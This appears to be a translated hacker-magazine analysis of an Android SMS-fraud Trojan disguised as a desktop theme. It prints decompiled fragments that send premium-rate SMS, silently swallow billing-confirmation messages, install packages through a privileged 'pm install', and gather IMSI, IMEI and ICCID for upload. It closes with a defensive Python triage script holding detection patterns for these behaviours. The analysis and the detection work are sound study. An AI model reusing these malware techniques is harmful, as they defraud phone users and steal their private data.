Android Trojan Analysis and Writing



Author: mangel

I. Introduction to Android Trojans

Android is more open than the iPhone: it allows third-party applications to be installed, even ones that have not been approved by Google's Android Market store, but that openness also appears to increase the security risk. Malware-infected applications have been found in Android Market itself, though users can defend themselves, as they do on a PC, by installing antivirus software.

II. Overview

Once installed, the program presents itself as a desktop theme that can also set wallpapers and similar items.

When run, it obtains root privileges and silently downloads and installs programs; it sends premium-rate SMS messages to subscribe to SP (service provider) services and intercepts the returned billing-confirmation messages, maliciously draining the user's account; and it steals private data such as the user's contacts and uploads it to a server.

III. Sample Characteristics

1. Sensitive permissions

Source: 黑客防线 (www.hacker.com.cn). Please credit the source when reposting.

    android.setting.START_SEND_SMS
    android.setting.SMS_SENT
    android.provider.Telephony.SMS_RECEIVED

2. Entry point and malicious modules

    public class MyReceiver extends BroadcastReceiver {}

(1) Sending and intercepting SMS:

    // Decompiled fragment: replies with a multipart SMS to the address the message came from.
    String str39 = "android.setting.SMS_SENT";
    try
    {
        String str41 = arrayOfSmsMessage[i13].getOriginatingAddress();
        SmsManager localSmsManager4 = localSmsManager1;
        ArrayList localArrayList7 = localArrayList2;
        localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null);
    }

    // Decompiled fragment: swallows incoming SMS that look like billing confirmations
    // (SP short code, price strings, "customer service", "tariff") so the user never sees them.
    if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED"))
        if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166"))
            || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523"))
            || (arrayOfSmsMessage[i13].getMessageBody().contains("客服"))
            || (arrayOfSmsMessage[i13].getMessageBody().contains("资费"))
            || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元"))
            || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元"))
            || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条"))
            || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次")))
            abortBroadcast();

(2) Obtaining root privileges and installing/uninstalling programs:

    // Decompiled fragment: installs an APK from the app's private files directory
    // through a privileged "pm install" invocation.
    private void installApk(String paramString1, String paramString2)
    {
        try
        {
            Runtime localRuntime = Runtime.getRuntime();
            StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");


            File localFile2 = this.mContext.getFilesDir();
            String str = localFile2 + "/" + paramString2;
            Process localProcess = localRuntime.exec(str);
        }

    private void installAPK()

    // Decompiled fragment: removes the helper package and (re)starts the malicious service.
    private void uninstallPlugin()
    {
        try
        {
            int i = Log.d("agui", "uninstall");
            Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root");
            Intent localIntent1 = new Intent("android.intent.action.RUN");
            Context localContext = this.mContext;
            Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);
            ComponentName localComponentName = this.mContext.startService(localIntent1);
            return;
        }
    }

(3) Stealing and uploading private data:

    // Decompiled fragment: builds the upload record (device identifiers, phone number,
    // timestamps, campaign ids) and hands it to a background network task.
    String str8 = Long.toString(System.currentTimeMillis());
    Object localObject1 = localHashtable.put("id", str8);
    Object localObject2 = localHashtable.put("imsi", str4);
    Object localObject3 = localHashtable.put("imei", str5);
    Object localObject4 = localHashtable.put("iccid", str6);
    Object localObject5 = localHashtable.put("mobile", str7);
    String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss");
    Object localObject6 = localHashtable.put("ctime", str9);
    Object localObject7 = localHashtable.put("osver", "1");
    Object localObject8 = localHashtable.put("cver", "010101");
    Object localObject9 = localHashtable.put("uid", str1);
    Object localObject10 = localHashtable.put("bid", str2);
    Object localObject11 = localHashtable.put("pid", str3);
    Object localObject12 = localHashtable.put("softid", paramString2);

    MessageService.4 local4 = new MessageService.4(this, paramIResponseListener);
    NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4);
    String[] arrayOfString = new String[1];
    arrayOfString[0] = paramString1;
    AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);

    public class NetTask extends AsyncTask
    {
        protected String doInBackground(String[] paramArrayOfString)
        {
            URL localURL1 = new java/net/URL;
            String str5 = localStringBuffer1.toString();
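As an added example that is not part of the original analysis or of the sample's code: a small static triage script that checks decompiled text for the three behaviours documented in (1)-(3), namely an SMS receiver that aborts broadcasts on billing keywords or the SP short code, a privileged "pm install", and collection of IMSI/IMEI/ICCID. The rule weights, the threshold and the embedded sample input are assumptions made for this example.

```python
import re

# Constructed sample input (not taken from the sample's APK): a few lines in the
# style of the decompiled receiver and installer fragments quoted in this analysis.
SAMPLE_SOURCE = '''
if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED"))
    if ((msg.getOriginatingAddress().contains("10658166"))
        || (msg.getMessageBody().contains("资费"))
        || (msg.getMessageBody().contains("元/条"))) abortBroadcast();
StringBuilder sb = new StringBuilder("sudo pm install -r ");
localHashtable.put("imsi", str4); localHashtable.put("imei", str5); localHashtable.put("iccid", str6);
'''

# (rule name, regex, weight). The weights are assumptions chosen for this example;
# the behaviours they encode are the ones described in the analysis above.
RULES = [
    ("sms_received_receiver",  r'"android\.provider\.Telephony\.SMS_RECEIVED"',              1),
    ("abort_sms_broadcast",    r'\babortBroadcast\s*\(',                                      3),
    ("billing_keyword_filter", r'contains\("(?:资费|客服|元/条|元/次|\d+\.\d{2}元)"\)',          3),
    ("sp_shortcode_filter",    r'contains\("106\d{5,}"\)',                                    2),
    ("privileged_pm_install",  r'\b(?:su|sudo)\s+pm\s+install\b',                             3),
    ("device_id_collection",   r'put\("(?:imsi|imei|iccid)"',                                 1),
]

def scan(source: str) -> dict:
    """Map each matching rule name to the number of matches in the decompiled text."""
    return {name: len(re.findall(pat, source))
            for name, pat, _ in RULES if re.search(pat, source)}

def score(findings: dict) -> int:
    """Sum the weights of the rules that fired (a rule counts once, however many hits)."""
    weights = {name: w for name, _, w in RULES}
    return sum(weights[name] for name in findings)

def verdict(source: str, threshold: int = 6) -> str:
    """'suspicious' when the combined evidence reaches the threshold, else 'benign'.
    A plain SMS app that registers SMS_RECEIVED and aborts the broadcast scores only 4,
    so billing-keyword or silent-install evidence is needed to cross the line."""
    return "suspicious" if score(scan(source)) >= threshold else "benign"

if __name__ == "__main__":
    hits = scan(SAMPLE_SOURCE)
    print(f"{verdict(SAMPLE_SOURCE)} (score {score(hits)}): {hits}")
```

Run it over the output of a decompiler such as the one that produced the fragments above; single rules are weak on their own, and the combination is what marks the sample.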
